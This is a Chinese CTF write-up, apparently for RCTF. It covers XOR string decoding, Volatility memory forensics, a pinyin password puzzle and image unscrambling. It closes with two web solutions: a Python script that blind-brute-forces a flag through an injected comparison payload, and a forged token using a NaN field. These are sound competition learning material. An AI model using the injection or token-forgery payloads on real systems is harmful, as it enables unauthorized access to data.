本文最后更新于 396 天前,其中的信息可能已经有所发展或是发生改变。
原本都打算放弃第一场分站赛,第一天就出了三个解,再加上上海赛,人力精力严重不够 最后9小时密码上大分,硬是进了前二十,师傅们辛苦 累,hvv + rctf + 上海 + sb ppt大赛答辩,天天通宵,快死了
logo="""
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
""".strip()
企图挖出一个新的CVE,尝试过压缩算法,但是不了了之(评价为逃逸做多了,脑子不正常了
if (this .j > 3000 ) {
int [] iArr = {164 , 158 , 95 , 107 , 4 , 215 , 108 , 115 , 5 , 8 , 25 , 57 , 41 , 236 , 231 , 17 , 85 };
int [] iArr2 = {246 , 221 , 11 , 45 , WindowsKeycodes.VK_F16, 148 , 45 , 36 , 70 , 73 , 78 , 8 , 98 , Keyboard.KEY_NUMPADEQUALS, 140 , 112 , 40 };
String str = "" ;
for (int i = 0 ; i < iArr.length; i++) {
str = str + String.valueOf((char ) (iArr[i] ^ iArr2[i]));
}
int [] iArr3 = {100 , 174 , 197 , 56 };
int [] iArr4 = {2 , LinuxKeycodes.XK_Acircumflex, 164 , 95 };
String str2 = "" ;
for (int i2 = 0 ; i2 < iArr3.length; i2++) {
str2 = str2 + String.valueOf((char ) (iArr3[i2] ^ iArr4[i2]));
}
this .d.add (new GameOverStat(str2, null , str));
}
from pwn import xor
a = [164 , 158 , 95 , 107 , 4 , 215 , 108 , 115 , 5 , 8 , 25 , 57 , 41 , 236 , 231 , 17 , 85 ]
b = [246 , 221 , 11 , 45 , 127 , 148 , 45 , 36 , 70 , 73 , 78 , 8 , 98 , 141 , 140 , 112 , 40 ]
print (xor (a, b))
Offset (V ) Name PID PPID Thds Hnds Sess Wow64 Start Exit
------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0xfffffa8018d94840 System 4 0 70 356 ------ 0 2024-05-19 06:58 :31 UTC +0000
0xfffffa8019355950 smss .exe 200 4 2 30 ------ 0 2024-05-19 06:58 :31 UTC +0000
0xfffffa8019de0b30 csrss .exe 288 280 9 425 0 0 2024-05-19 06:58 :32 UTC +0000
0xfffffa801a00d060 csrss .exe 380 372 10 185 1 0 2024-05-19 06:58 :33 UTC +0000
0xfffffa801a00a420 wininit .exe 388 280 4 80 0 0 2024-05-19 06:58 :33 UTC +0000
0xfffffa801a082750 services .exe 440 388 12 209 0 0 2024-05-19 06:58 :33 UTC +0000
0xfffffa801a0bc4d0 winlogon .exe 464 372 4 111 1 0 2024-05-19 06:58 :34 UTC +0000
0xfffffa801a0c6400 lsass .exe 492 388 10 560 0 0 2024-05-19 06:58 :34 UTC +0000
0xfffffa801a0c8060 lsm .exe 500 388 11 143 0 0 2024-05-19 06:58 :34 UTC +0000
0xfffffa801a1535f0 svchost .exe 620 440 15 367 0 0 2024-05-19 06:58 :35 UTC +0000
0xfffffa801a16db30 vmacthlp .exe 684 440 4 56 0 0 2024-05-19 06:58 :36 UTC +0000
0xfffffa801a17e060 svchost .exe 728 440 9 248 0 0 2024-05-19 06:58 :36 UTC +0000
0xfffffa801a1a25e0 svchost .exe 792 440 17 309 0 0 2024-05-19 06:58 :36 UTC +0000
0xfffffa8018e60250 svchost .exe 864 440 31 650 0 0 2024-05-19 06:58 :36 UTC +0000
0xfffffa801a1ecb30 svchost .exe 916 440 14 485 0 0 2024-05-19 06:58 :36 UTC +0000
0xfffffa801a207450 svchost .exe 964 440 12 216 0 0 2024-05-19 06:58 :36 UTC +0000
0xfffffa801a217b30 svchost .exe 1004 440 19 340 0 0 2024-05-19 06:58 :36 UTC +0000
0xfffffa801a25d4a0 svchost .exe 328 440 6 104 0 0 2024-05-19 06:58 :37 UTC +0000
0xfffffa801a2d8060 VGAuthService . 240 440 3 91 0 0 2024-05-19 06:58 :38 UTC +0000
0xfffffa801a2f8600 vmtoolsd .exe 276 440 9 272 0 0 2024-05-19 06:58 :39 UTC +0000
0xfffffa801a302b30 ManagementAgen 1048 440 11 91 0 0 2024-05-19 06:58 :39 UTC +0000
0xfffffa801a3b3870 svchost .exe 1228 440 7 100 0 0 2024-05-19 06:58 :40 UTC +0000
0xfffffa801a3d25f0 dllhost .exe 1332 440 21 210 0 0 2024-05-19 06:58 :40 UTC +0000
0xfffffa801a3ee060 WmiPrvSE .exe 1428 620 11 188 0 0 2024-05-19 06:58 :40 UTC +0000
0xfffffa801a400b30 dllhost .exe 1492 440 17 210 0 0 2024-05-19 06:58 :40 UTC +0000
0xfffffa801a41bb30 taskhost .exe 1576 440 10 175 1 0 2024-05-19 06:58 :41 UTC +0000
0xfffffa801a47e4f0 sppsvc .exe 1788 440 5 152 0 0 2024-05-19 06:58 :43 UTC +0000
0xfffffa801a4ae390 msdtc .exe 1848 440 16 156 0 0 2024-05-19 06:58 :44 UTC +0000
0xfffffa801a4e3060 dwm .exe 1400 964 7 118 1 0 2024-05-19 06:58 :51 UTC +0000
0xfffffa801a4e0060 explorer .exe 1480 1292 28 601 1 0 2024-05-19 06:58 :51 UTC +0000
0xfffffa801a53fb30 vmtoolsd .exe 1468 1480 7 191 1 0 2024-05-19 06:58 :56 UTC +0000
0xfffffa801a544060 Poner .exe 1420 1480 9 214 1 1 2024-05-19 06:58 :56 UTC +0000
0xfffffa801a5d09e0 WmiPrvSE .exe 1756 620 12 255 0 0 2024-05-19 06:59 :00 UTC +0000
0xfffffa801a604b30 WmiApSrv .exe 1932 440 7 112 0 0 2024-05-19 06:59 :01 UTC +0000
0xfffffa801a6eeb30 idaq64 .exe 2172 2156 7 275 1 1 2024-05-19 06:59 :21 UTC +0000
$ volatility -f Windows_7_ x64_52Pojie_ 2-Snapshot2.vmem --profile=Win7SP1x64 memdump -p 2172 -D ./
Volatility Foundation Volatility Framework 2.6
**** **** **** **** **** **** **** **** **** **** **** **** **** **** **** **** **** ****
Writing idaq64.exe [ 2172] to 2172.dmp
353f4e2b566b746a5d6d6f736c773868596e20213c714f09367d557251322766
0c0f2b486f5d46536459594b5f475b5b6b5f15165d12766b071b334a67071100
Python 3.10 .10 (tags/v3.10 .10 :aad5f6a, Feb 7 2023 , 17 :20 :36 ) [MSC v.1929 64 bit (AMD64)] on win32
Type "help" , "copyright" , "credits" or "license" for more information.
>>> a = "353f4e2b566b746a5d6d6f736c773868596e20213c714f09367d557251322766"
>>> b = "0c0f2b486f5d46536459594b5f475b5b6b5f15165d12766b071b334a67071100"
>>> from pwn import xor
>>> xor(bytes .fromhex(a), bytes .fromhex(b))
b'90ec9629946830c32157ac9b1ff8656f'
filescan后发现有个enc.i64
,使用volatility3导出
$ python3 vol.py -f ../Windows_7_x64_52Pojie_2-Snapshot2.vmem filescan.FileScan | grep i64
0x7e578330 100.0 \Users\Administrator\Desktop\enc.i64 216
$ python3 vol.py -f ../Windows_7_x64_52Pojie_2-Snapshot2.vmem dumpfiles.DumpFiles --physaddr 0x7e578330
Volatility 3 Framework 2.5 .0
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0x7e578330 enc.i64 file.0x7e578330 .0xfa801a460940 .DataSectionObject.enc.i64 .dat
很明显与火狐相关,导出所有.sqlite
文件,在places.sqlite
中看到个百度网盘
$ vol.py -f gogogo.raw --profile=Win7SP1x86_23418 dumpfiles -Q 0x000000007f634f80 -D ./
Volatility Foundation Volatility Framework 2.6 .1
DataSectionObject 0x7f634f80 None \Device\HarddiskVolume1\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\s1qv2uam.de
SharedCacheMap 0x7f634f80 None \Device\HarddiskVolume1\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\s1qv2uam.def au
https ://pan.baidu.com/share/init?surl=ZllFd8 IK-oHvTCYl61 _7 Kw
$ vol.py -f gogogo.raw
Volatility Foundation Volatility Framework 2.6 .1
Session WindowStation Format Handle Object Data
1 WinSta0 CF_UNICODETEXT 0x2c01b1 0xfcf3c570 cwqs
1 WinSta0 0x0 L 0x10
1 WinSta0 0x0 L 0x0
1 WinSta0 0x0 L 0x0
1
niuo ybufmefhui kjqillxdjwmi uizebuuidvooudpn uibuui jqybdm vegeyisivemeuoll jxysgowodmnkderf dbmzfa hkhkdazizvjnybufme hkwjdeggmana mimajqueviigkyllda doqisl bapnynqrpnqrxcxxzimu
strings后发现b站用户(我什么时候才能学会strings大法
你说 有什么方式 看起来像加密
是这不是 对哦
双拼 是不是 就有点 这个意思
这么说来 借用过我电脑的人 都没法 好好打字
最近有什么 好玩的跟妈 那 密码就设置成
快来打 夺旗赛 吧
拼音全拼 全小写字母
from PIL import Image
for flag in range(10 ):
filename = 'flag{}.png'.format(flag)
img = Image.open(filename)
size = img.size
weight = int(size[0 ] // 40 )
height = int(size[1 ] // 40 )
ress = []
for i in range(4 ):
res = Image.new('RGB',(400 ,400 ))
ress .append(res)
for j in range(40 ):
for i in range(40 ):
box = (weight * i, height * j, weight * (i + 1 ), height * (j + 1 ))
region = img.crop(box)
for n in range(4 *100 ):
pos = n // 4
x = pos % 10
y = pos // 10
pos2 = n % 4
ii = pos2 % 2
jj = pos2 // 2
tmp = region.getpixel((x*2 +ii,y*2 +jj))
ress [pos2 ].putpixel((i*10 +x,j*10 +y),tmp)
for i in range(4 ):
ress [i].save('./{}.png'.format(flag*4 +i))
from requests import post
from string import printable
url = "http://ip:port/key1"
printable = bytes (sorted (list (printable.encode()))).decode().replace(")" , "" ).replace("(" , "" )
payload = "'||love_key>='RCTF{"
while True :
for i in range (len (printable)):
test = payload + printable[i]
data = {"key1" : test}
resp = post(url, data=data)
if resp.text == "wrong" :
payload += printable[i - 1 ]
break
print(payload)
key2用NaN + Number改userinfo
createToken ({username : "" ,love_time : NaN,have_lovers : true,})
from requests import post
url = "http://ip:port/check"
data = {"love_token" : "eyJ1c2VybmFtZSI6IiIsImxvdmVfdGltZSI6bnVsbCwiaGF2ZV9sb3ZlcnMiOnRydWV9.6711263ca1c25b2bcc973a4d2c989adfacab694ef5406650c1cf58a178b42fbe" }
resp = post(url, data =data )
print(resp.text)